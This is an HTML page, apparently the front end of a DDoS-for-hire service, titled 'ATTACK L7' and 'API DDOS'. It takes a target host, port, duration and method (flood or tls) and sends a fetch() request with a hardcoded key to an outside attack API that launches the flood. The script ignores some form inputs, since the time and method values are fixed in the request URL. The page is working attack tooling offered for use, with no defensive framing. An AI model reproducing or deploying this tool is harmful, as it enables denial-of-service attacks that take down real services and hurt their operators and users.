<!DOCTYPE html>
<html>
<head>
  <title>ATTACK L7</title>
  <style>
    body {
      font-family: sans-serif;
      background-color: #f4f4f4;
      display: flex;
      justify-content: center;
      align-items: center;
      min-height: 100vh;
    }

    .container {
      background-color: #fff;
      padding: 30px;
      border-radius: 5px;
      box-shadow: 0 2px 5px rgba(0, 0, 0, 0.1);
    }

    h1 {
      text-align: center;
      color: #333;
    }

    form {
      display: flex;
      flex-direction: column;
      gap: 15px;
    }

    label {
      color: #555;
      font-weight: bold;
    }

    input[type="text"],
    input[type="number"],
    select {
      padding: 10px;
      border: 1px solid #ccc;
      border-radius: 3px;
    }

    button {
      padding: 10px 20px;
      background-color: #007bff;
      color: #fff;
      border: none;
      border-radius: 3px;
      cursor: pointer;
    }

    button:hover {
      background-color: #0069d9;
    }

    .result {
      margin-top: 20px;
      text-align: center;
      font-size: 18px;
    }

    .result.success {
      color: #28a745;
    }

    .result.error {
      color: #dc3545;
    }
  </style>
</head>
<body>
  <div class="container">
    <h1>API DDOS</h1>
    <form id="apiForm">
      <label for="key">API Key:</label>
      <input type="freetest" id="key" name="key" required>

      <label for="host">Host:</label>
      <input type="text" id="host" name="host" required>

      <label for="port">Port:</label>
      <input type="number" id="port" name="port" required>

      <label for="time">Time (seconds):</label>
      <input type="number" id="time" name="time" required>

      <label for="method">Method:</label>
      <select id="method" name="method">
        <option value="Method 1">flood</option>
        <option value="Method 2">tls</option>
      </select>

      <button type="submit">Attack Sent</button>
    </form>
    <div class="result"></div>
  </div>

  <script>
    const apiForm = document.getElementById('apiForm');
    const resultDiv = document.querySelector('.result');

    apiForm.addEventListener('submit', (event) => {
      event.preventDefault(); // Ngăn form submit thông thường

      const host = document.getElementById('host').value;
      const port = document.getElementById('port').value;
      const time = document.getElementById('time').value;
      const method = document.getElementById('method').value;

      // Gửi yêu cầu đến API
      fetch(`https://api.nguyenhaodz.site/api/attack?key=ngu&host=${host}&port=${port}&time=60&method=flood`)
        .then(response => {
          if (response.ok) {
            return response.text();
          } else {
            throw new Error('API request failed');
          }
        })
        .then(data => {
          // Hiển thị kết quả thành công
          resultDiv.textContent = `Attack sent ${host} ${port} ${time} ${method}`;
          resultDiv.classList.add('success');
        })
        .catch(error => {
          // Hiển thị kết quả lỗi
          resultDiv.textContent = `Error: ${error.message}`;
          resultDiv.classList.add('error');
        });
    });
  </script>
</body>
</html>